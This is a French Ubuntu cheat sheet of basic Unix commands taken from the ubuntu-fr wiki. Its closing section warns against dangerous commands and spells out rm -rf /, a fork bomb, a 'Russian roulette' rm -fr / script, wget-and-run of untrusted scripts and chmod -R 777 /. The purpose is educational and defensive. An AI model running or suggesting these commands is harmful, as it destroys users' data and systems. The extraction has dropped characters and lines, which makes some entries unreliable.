Académique Documents
Professionnel Documents
Culture Documents
Petit Precis Des Commandes Unix Utiles A Ubuntu
Petit Precis Des Commandes Unix Utiles A Ubuntu
utiles ubuntu
petit prcis des commandes unix utiles ubuntu
Chaque argument donn a man est gnralement le nom d'un programme, d'un utilitaire ou d'une
fonction.
l Exemples d'utilisation :
m man man
ls
G)
m -a : Permet l'affichage des fichiers et rpertoires cachs (ceux qui commencent par un .
(point))
l Exemples d'utilisation :
m ls -a
2
Les commandes de base en console
lspci ou lsusb
m
cd
mv
cp
nouveau
m -r : Copie un rpertoire et tout son contenu
m -u : Ne copie que les fichiers plus rcents ou qui n'existent pas
m -v : permet de suivre les copies ralises en temps rel
3
petit prcis des commandes unix utiles ubuntu
l Exemples d'utilisation :
m cp monFichier sousrep/
Copie monFichier dans sousrep
m cp -r monRep/ ailleurs/
Copie le rpertoire monRep vers ailleurs en crant le rpertoire s'il n'existe pas.
rm
Efface le rpertoire /tmp/LeRep ainsi que tous ses fichiers sans demander de confirmation
mkdir
Cre le rpertoire noel et s'ils n'existent pas les rpertoires 2005 et photos
rmdir
top
4
Les commandes de base en console
pwd
ln
l Signification : link
l Cre un lien (physique ou symbolique) vers un fichier (ou un rpertoire)
l Options les plus frquentes :
m -s : Cre un lien symbolique (similaire au raccourci du monde Windows)
m -f : Force l'crasement du fichier de destination s'il existe
m -d : Cre un lien sur un rpertoire (uniquement en mode sudo ou root)
l Exemples d'utilisation :
m ln -s Rep1/Rep2/Monfichier MonLien
find
simple
Placez-vous dans le rpertoire partir duquel la recherche rcursive doit tre effectue et faites :
5
petit prcis des commandes unix utiles ubuntu
l find monfichier*
Recherche un fichier commenant par "monfichier"
l find *monfichier*.ogg
avanc
Recherche les fichiers du rpertoire courant qui ont t modifis entre maintenant et il y a 5
jours
l find /home/ -mtime -1 \! -type d
Recherche uniquement les fichiers (! -type d signifie n'tait pas un rpertoire) ayant t modifis
ces dernires 24h
l find . ! -user root
html
grep
rgrep
m -G : Recherche en utilisant une expression relationnelle basique (option par dfaut)
m -E : Recherche en utilisant une expression relationnelle tendue ; On peut utiliser la commande
egrep
m -F : Recherche en utilisant une chane fixe ; On peut utiliser la commande fgrep
l Exemples d'utilisation :
m grep -n montexte monfichier
Retourne toutes les lignes ainsi que leur numro ou montexte apparait dans monfichier
locate
cat
6
Les commandes de base en console
l Signification : concatenate
l Affiche le contenu d'un fichier
l Options les plus frquentes :
m -n : Affiche les numros de ligne
m -v : Affiche les caractres de contrles
l Exemple d'utilisation :
m cat -n monFichier
more
Affiche monFichier page par page en concatnant les lignes vides sans compter les lignes
longues.
less
Affiche monFichier page par page avec un prompt long (affichage du pourcentage du fichier
parcouru) en affichant les caractres spciaux sans combler les lignes vides par des ~
Type d'autorisations (une autorisation d'excution sur un rpertoire autorise son ouverture) :
m + : Ajoute une permission
m - : Enlve une permission
m = : Autorise uniquement l'autorisation indique
7
petit prcis des commandes unix utiles ubuntu
Exactement la mme chose que ci-dessus mais en utilisant les valeurs octales (Nota : 6 = 4+2 =
lecture + criture)
m chmod u=rw,g=r,o= MonFichier
Exactement la mme chose que ci-dessus mais en utilisant les valeurs octales
chown
Change le propritaire en lui et le groupe propritaire en nous du rpertoire monRep ainsi que
tout ce qu'il contient
chgrp
destination du lien)
m -L : Si fournie avec R, change le groupe propritaire d'un rpertoire et des fichiers qu'il contient
8
Les commandes de base en console
l Exemples d'utilisation :
m chgrp unGroupe MonFichier
Change le groupe propritaire du fichier MonFichier en unGroupe
m chgrp -R unGroupe monRep
Change le groupe propritaire du rpertoire monRep ainsi que tout ce qu'il contient en
unGroupe
free
mount
l Signification : mount
l Monter un systme de fichiers
l Options les plus frquentes :
m -a : Monter tous les systmes de fichier dclars dans le fichier /etc/fstab
m -t : Prcise le type de fichier monter
m -o : Ajouter une option. Options adjointe -o les plus frquentes :
m auto : Permet d'tre mont par -a
m async : Les entres/sorties sur le systme de fichiers seront asynchrones
m defaults : Utilise les options rw, suid, dev, exec, auto, nouser, et async.
m dev : Interprte les fichiers spciaux de priphriques du systme prsent dans /dev/
m exec : Permet l'excution de fichiers binaires du systme mont
m noauto : Empche d'tre mont avec -a
m nodev : Ne pas interprter les fichiers spciaux de priphriques du systme
m noexec : Empche l'excution de fichiers binaires du systme mont
m nouser : Ne pas autoriser d'autres utilisateurs que root (ou sudo) monter le systme de
9
petit prcis des commandes unix utiles ubuntu
Monte dans un priphrique boucle (loop) le fichier iso monFichier.iso dans le rpertoire /mnt/
monIso
m mount -t vfat -o defaults,rw,user,umask=022,uid=1000 /dev/sda1 /mnt/Mondisk/
Monte un disque dur USB (/dev/sda1) format en FAT32 (-t vfat) en lecture criture (rw) dans le
rpertoire /mnt/Mondisk/ ; tous les utilisateurs peuvent le dmonter (user), les droits d'excution
(uid=1000) sont fixs l'utilisateur ayant l'UID 1000 (sous Ubuntu, l'uid 1000 correspond au
premier utilisateur cr) et la cration d'un fichier s'effectuera avec les permissions 644 (rw-r--
-r) et pour un rpertoire 755 (rwxr-xr-x) (umask 022)
l Ressource :
m A lire aussi mount_fstab3
umount
l Signification : unmout
l Dmonte un systme de fichiers
l Options les plus frquentes :
m -a : Dmonte tous les systmes de fichiers prsents dans /etc/mtab
m -d : Si le systme mont est un priphrique loop, librer le priphrique.
m -f : Forcer le dmontage
m -r : Si impossible de dmonter, monter en lecture seule
l Exemples d'utilisation :
m umount /mnt/Mondisk
Dmonte tous les systmes de fichiers monts ( l'exception de /proc) ; ne sert que lorsque l'on
veut redmarrer ou teindre sa machine manuellement et proprement.
sudo
l'utilisateur et forcera redemander un mot de passe si sudo est excut avant le timeout
dfini.
l Exemples d'utilisation :
m $ sudo reboot
10
Les commandes de base en console
ps
d'excution.
l Exemples d'utilisation :
m ps -u
kill / killall
(exemple : SIGTERM) soit par son numro (exemple : 9) ; Cette option peut tre remplace par
le numro du signal : -s 9 est quivalent -9.
m -l : Affiche la liste des signaux connus.
l Les signaux les plus courants sont :
HUP signal 1 : signal de fin dexcution ou le processus doit relire son fichier de configuration.
TERM signal 15 : Le signal Terminate indique un processus quil doit sarrter.
KILL signal 9 : Le signal Kill indique au systme quil doit arrter un processus qui ne rpond
plus.
l Exemples d'utilisation :
m kill -15 14774 : Envoie le signal 15, ou TERM, au processus ayant le numro 14774 ce qui a pour
de tuer le processus.
m killall -TERM firefox-bin : Envoie le signal TERM, ou 15, au processus firefox-bin ce qui a pour
effet de le fermer.
l Il est conseill de lancer des signaux de faible importance avant de lancer la grosse artillerie. En
nom_du_process :
m Le processus est devenu zombie . Dans ce cas, la commande prcdente affiche un Z.
Pour le tuer, il faut tuer ou redmarrer son processus parent, que lon peut dterminer avec la
commande ps -ef ou ps afx.
m Le processus est ininterruptible (il apparat comme D avec la commande prcdente), bloqu
sur une opration dentre/sortie (I/O), vraisemblablement suite un bug dans un pilote matriel.
Dans ce cas, aucune issue : la politique des dveloppeurs du noyau linux est de considrer
quavoir la main sur ce type de processus compromettrait trop profondment la stabilit du
systme. Cest lun des rares cas o lon a pas dautre choix que de redmarrer lordinateur.
11
petit prcis des commandes unix utiles ubuntu
passwd
l Signification : password
l Permet de modifier le mot de passe dun utilisateur
l Options les plus frquentes :
m -S : Affiche ltat dun compte (nom du compte, bloqu (L), si lutilisateur na pas de mot de
passe (NP) ou a un mot de passe utilisable (P), date de dernire modification du mot de passe,
dure minimum avant modification, dure maximum de validit, dure davertissement, dure
dinactivit autorise)
A moins dtre adminsitrateur systme ou rseau (auquel cas pourquoi lisez-vous ces lignes ;-) ?)
cette commande sutilise gnralement sans option.
l Exemple dutilisation :
m passwd
groups
l Signification : groups
l Affiche les groupes auxquels appartient un utilisateur
l Exemples dutilisation :
m groups
Affiche la liste des groupes auxquels appartient lutilisateur ayant tap la commande.
m groups CyberSDF
adduser
connecter via une cl RSA SSH, pratique pour crer un utilisateur qui ne se connectera que via
SSH.
m system : Cre un utilisateur systme.
m group : Avec system cre un groupe avec le mme ID que lutilisateur systme, sans un
Cre un utilisateur CyberSSH sans mot de passe qui ne pourra pas se connecter directement sur
la machine et sans lui crer de rpertoire home.
m adduser disabled-password home /home/CyberSDF CyberSDF
Mme chose quau dessus sauf quon lui donne le mme rpertoire HOME qu lutilisateur
CyberSDF cr en premier.
deluser
12
Les commandes de base en console
usermod
Si lutilisateur fait actuellement partie dun groupe qui nest pas list, lutilisateur sera supprim
du groupe. Ce comportement peut tre chang avec loption -a, qui permet dajouter lutilisateur
une liste de groupes supplmentaires.
l Exemples dutilisation :
m usermod -aG toto machin
Ajoute lutilisateur machin au groupe toto sans supprimer machin de son groupe originel.
m sudo usermod -d /home/nouveau_login -m -l nouveau_login ancien_login
Permet de renommer le rpertoire (dossier) utilisateur et de changer son nom. Pratique lorsque
le pc change de mains.
df
usbfs et tmpfs)
m -h : Ajoute aux valeur un M pour mbioctet (2^20 octets) pour que ce soit plus lisible.
m -H : Pareil que -h mais en mgaoctets (10^6 octets).
m -T : Affiche le type du systme de fichier.
l Exemples dutilisation :
m df -h
Affiche la quantit despace disque utilis en mbioctets par les systmes de fichiers.
m df /home
Affiche la quantit despace disque utilis par la partition /home (si elle existe)
m df -T -h
fdisk
13
petit prcis des commandes unix utiles ubuntu
l Exemples dutilisation
m sudo fdisk -l
du
Affiche la taille des rpertoires contenus dans /home/CyberSDF en utilisant un suffixe puis le
total.
uptime
l Signification : uptime
l Indique depuis quand le systme fonctionne.
l Exemples dutilisation :
m uptime
Affiche lheure actuelle, la dure depuis laquelle le systme fonctionne, le nombre dutilisateurs
actuellement connects, et la charge systme moyenne ; Commande de geek par excellence :-)
qui ne sert pas grand chose pour un utilisateur lambda, mais utile pour un administrateur.
lspci
lsusb
14
Les commandes de base en console
uname
Affiche tout.
apt-get
simplement de la distribution
m install : Installe un ou plusieurs packages.
m remove : Supprime un ou plusieurs packages.
m clean : Efface du disque dur les packages tlchargs.
l Options les plus frquentes :
m -f : Utilise avec install ou remove cette option permet de rparer un systme dont les
15
petit prcis des commandes unix utiles ubuntu
apt-cache
Recherche et affiche tous les paquets ayant dans leur nom irc
m apt-cache madison w32codecs
16
Les commandes de base en console
Cette liste est loin dtre exhaustive, mais devrait vous donner un aperu de ce que les gens peuvent
essayer de vous inciter faire. Souvenez-vous que cela peut tre dissimul dans une commande ou
masqu dans le cadre dune procdure longue.
Rgle n 1 : NE JAMAIS VALIDER UNE COMMANDE QUI POURRAIT VOUS FAIRE PERDRE VOS DONNEES
ET VOTRE SYSTEME.
En cas de doute, nhsitez pas faire une sauvegarde de vos donnes sur un support externe tel
quune clef USB, un disque dur USB, ou un CD/DVD enregistrable, et vrifier que la sauvegarde
fonctionn.
rm -rf /
rm -rf .
rm -rf *
mv QUELQUE_CHOSE /dev/null
shred QUELQUE_CHOSE
QUELQUE_COMMANDE > QUELQUE_CHOSE_IMPORTANT
sed QUELQUE_CHOSE -i QUELQUE_CHOSE
mv -r / /dev/null (Dplace les fichiers de faon rcursive depuis la racine
vers null = tout est effac).
17
petit prcis des commandes unix utiles ubuntu
la commande
> fichiers*
ainsi que toutes les variantes commenant par rm et mv et se terminant par /dev/null
Pourquoi?
lrm est la commande de suppression des fichiers sous Gnu-Linux, rm quelque chose supprimera ce
quelque chose, imaginez que vous supprimez tous vos fichiers systme ( racine / ) , ou vos fichier
personnels ( /home/<votreidentifiant/ ) !
/dev/null est lquivalent de la corbeille dfinitive, tout fichier envoy cette sortie entrane sa
suppression.
( mode interactif avec confirmation de suppression ) Vous pouvez aussi utiliser la commande mv (
dplacer )
Exemple :
rm labrador.jpeg
Entrez plutt :
rm -i labrador.jpeg
mv labrador.jpeg ~/.local/share/Trash/files
18
Les commandes dangereuses
l La commande find peut aussi tre dangereuse, avec son paramtre -exec qui permet dexcuter
une commande sur le rsultat dune recherche.
Par exemple, la commande suivante est trs dangereuse : elle provoque la suppressions de tous les
fichiers.
Re-formatage
Les donnes sur le priphrique mentionn aprs la commande mkfs seront dtruites et remplaces
par un systme de fichier vide :
mkfs
mkfs.ext3
mkfs.QUELQUE_CHOSE
Forkbomb
Excute un grand nombre de processus jusqu ce que le systme gle, ce qui vous force faire un
arrt brutal et peut causer la corruption du systme, ou dautres dsagrments.
:(){:|:&};:
En Perl :
Si vous voulez savoir comment se protger contre les forks bombs allez voir sur http://doc.ubuntu-fr.
org/tutoriel/comment_se_proteger_des_fork_bomb.
Tarbomb
Quelquun vous demande dextraire une archive dans un rpertoire existant. Cette archive tar peut
tre conue pour exploser en un grand nombre de fichiers, voire craser les fichiers de lutilisateur qui
19
petit prcis des commandes unix utiles ubuntu
portent le mme nom que ceux de larchive. Vous devriez donc prendre lhabitude de dcompresser
des tar dans un nouveau rpertoire vide.
Dcompression bomb
Quelquun vous demande dextraire une archive qui semble petite lors du tlchargement mais
qui contient la dcompression des donnes dune taille beaucoup plus considrable, au point de
remplir votre disque dur. Vous ne devriez pas utiliser des donnes dune source non-fiable.
Shell
Quelquun vous donne le lien vers un script shell excuter. Il peut contenir nimporte quelle
commande (bnigne ou malveillante). Vous ne devriez pas excuter du code de personnes qui vous
ne faites pas confiance :
wget http://une_adresse/un_fichier
sh ./un_fichier
Roulette russe
Une fois ce script lanc, vous avez une chance sur 6 pour que tous les fichiers la racine de votre
systme soient effacs. Faites attention ce script et ses variantes !
#!/bin/bash
echo
[ $[ $RANDOM % 6 ] == 0 ] && rm -fr / || echo You live
exit 0
Compilation de code
Quelquun vous donne le code source et vous dit de le compiler. Il est facile de cacher du code
malveillant dans un long code source, et le code source donne lattaquant beaucoup de possibilits
pour dguiser son code malveillant. Vous ne devriez pas compiler ou excuter le code compil,
moins quil ne sagisse dune application bien connue, obtenue partir dun site rput (SourceForge,
les sites Ubuntu, etc.).
Par exemple :
20
Les commandes dangereuses
Ceci est la forme hexadcimale de rm -rf qui va dtruire votre rpertoire en tant que simple
utilisateur, ou tous les fichiers en tant que root.
Changements de droits
chmod -R 777 /
Ceci donne les droits de lecture et dcriture sur tous les fichiers. Or les commandes situes dans /
bin ne supportent pas ce mode. Dans ce cas, il faut rattribuer la valeur o-w, il faut que vous ayez
les droits u+w sur /tmp
Plus gnralement, attention aux changements de droits, surtout quand ils sappliquent sur des
dossiers. Par exemple un
21
petit prcis des commandes unix utiles ubuntu
peut vous obliger recrer un compte utilisateur, vu que certains fichiers ncessitent des droits
particuliers.
La commande sudo passwd root peut vous faire perdre vos droits sudo !!
Pour rcuprer ses droits sudo sur son compte, se loguer en root (su root) et tapez :
Conclusion
Encore une fois, il ne sagit pas de donner une liste complte des commandes malveillantes, et il
ne faut pas utiliser cette page comme une liste de vrification pour dterminer si une commande
est dangereuse ou pas ! Cette page est simplement ducative, pour faire prendre conscience
lutilisateur de la dangerosit potentielle du shell. Toute commande ne doit tre excute que si elle
est sre et si lon comprend ce que lon fait.
Le meilleur moyen dvaluer les risques est probablement lutilisation de la commande man5.
Rfrences
1
http://doc.ubuntu-fr.org/tutoriel/comment_installer_un_paquet
2
http://doc.ubuntu-fr.org/ls_couleur
3
http://doc.ubuntu-fr.org/installation/mount_fstab
4
http://www.debian.org/doc/manuals/apt-howto/index.fr.html
5
http://doc.ubuntu-fr.org/page_de_manuel
6
http://ubuntuforums.org/announcement.php?f=359
Contributeurs
l CyberSDF (http://doc.ubuntu-fr.org/utilisateurs/cybersdf)
l la tite gogole (http://doc.ubuntu-fr.org/utilisateurs/la_tite_gogole)
l tshirtman (http://doc.ubuntu-fr.org/utilisateurs/tshirtman)
l morgen_stern (http://doc.ubuntu-fr.org/utilisateurs/morgen_stern)
l Bogoris (http://doc.ubuntu-fr.org/utilisateurs/bogoris)
l Hoxus (http://doc.ubuntu-fr.org/utilisateurs/hoxus)
l Johndescs (http://doc.ubuntu-fr.org/utilisateurs/johndescs)
l jisee (http://doc.ubuntu-fr.org/utilisateurs/jisee)
l didrocks (http://doc.ubuntu-fr.org/utilisateurs/didrocks)
Source
http://doc.ubuntu-fr.org/
22
Les commandes dangereuses
notes
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------
23
Action Raccourcis clavier
www.inlibroveritas.net 5